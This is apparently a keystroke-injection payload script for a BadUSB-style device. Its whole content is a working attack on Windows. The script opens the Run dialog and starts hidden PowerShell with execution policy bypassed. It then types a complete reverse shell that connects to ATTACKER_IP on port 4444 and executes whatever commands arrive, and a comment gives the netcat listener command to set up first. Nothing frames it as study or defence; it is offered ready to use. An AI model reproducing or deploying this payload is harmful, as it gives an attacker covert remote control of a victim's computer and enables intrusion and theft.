Rem:PowerShell reverse shell (Windows)
Rem:CHANGE the IP and PORT below to your listener
Rem:Start listener first: nc -lvnp 4444
CustomDelay:500
Press:131+114
CustomDelay:500
Print:powershell -w hidden -ep bypass
Press:176
CustomDelay:1000
Print:$c=New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()
Press:176